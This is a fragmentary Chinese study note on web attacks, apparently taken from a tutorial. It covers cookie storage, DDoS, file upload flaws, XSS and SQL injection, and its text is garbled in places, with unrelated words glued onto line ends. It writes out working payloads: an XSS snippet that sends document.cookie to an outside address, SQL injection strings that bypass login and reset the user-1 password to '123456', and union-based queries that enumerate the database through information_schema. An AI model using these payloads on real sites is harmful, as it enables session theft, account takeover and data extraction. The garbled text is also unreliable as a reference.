根据一教程简单整理,还没整理完。慢慢拼凑。。。php
cookies 存储 敏感信息html
ddos拒绝服务攻击: 多线程并发 或底层代码 tcp简历握手链接mysql
文件上传的漏洞 文件上传过滤 经过后缀名过滤 二进制存储文件头和尾获取是否有效 修改服务器核心参数,禁止脚本引擎运行在系统里web
xss跨站攻击 恶意插入web页面html代码。特殊目的html会被执行目的 如何写xss脚本:单反提供输入的接口,都应检查合法的检查html代码 <input type="button" value="点我" onclick="alert('你好')"/> <img src="http图片连接" onclick="alert('nibeiheile')"/> 获取cookie:fiddler发cookie。 获取方法1cookie:js--document.cookie onclick="alert('document.cookie')"/> location.href="192.168.1.1/cookie.php?cookie="+document.cookie" />sql
方法2:onclick="document.getElementByid('元素值').value=document.cookie" />数据库
sql注入:服务器
最通用的攻击手段,关系型数据库cookie
服务器对sql注入的防范也是很是严密的多线程
1.获取服务器端数据库内容并发
2.修改数据库内容 如 CSDN被攻击
1.php,asp,jsp,mysql,oracle,access.......
sql语句 利用sq注入修改密码 1.服务器没有对输入长度进行验证。 2.须要猜想代表列明和加密方式。3.禁用测试不用非法 利用url地址参数进行注入: 1.试探是否有sql注入的可能 2.单引号是字符串的分隔符。3.直接把单引号转义' '
username password
select * from user where username = 'username' and password='password' $username=x' or userid=1 #' select * from user where username = 'x' or userid=1 #'' and password='password' #才userid 1 2 3或uid或id 如登录页面输入x' or userid=1 #'提示密码错误说明用户存在那就证实用户存在有漏洞注入
select username, password form user where username='username' if (count() == 1) if (password=$password) 登录成功 x'; update user set password='123456' where userid=1#' 长度页面若是验证长度能够post服务器 select username, password form user where username='x'; update user set password='123456' where userid=1#'' 若是密码不能被修改把明文的123456加密成md5尝试 猜想多数列明代表和密码加密方式等。。。。。。。。。。
select * from thread where locale=en#My%20Shares:/// n#My%20Shares:/// order by 10 select * from thread where locale=en#My%20Shares:/// n#My%20Shares:/// and 1=2
n#My%20Shares:///' select * from thread where locale=en#My%20Shares:///' //语法不对
union select 1,2,3,4
select * from thread where locale=en#My%20Shares:/// and 1=2 union select 1,database(),user(),4 limit0,1 mysql函数显示列 select 1,column_name,1,2,3,4 from information_schema.columns where table_schema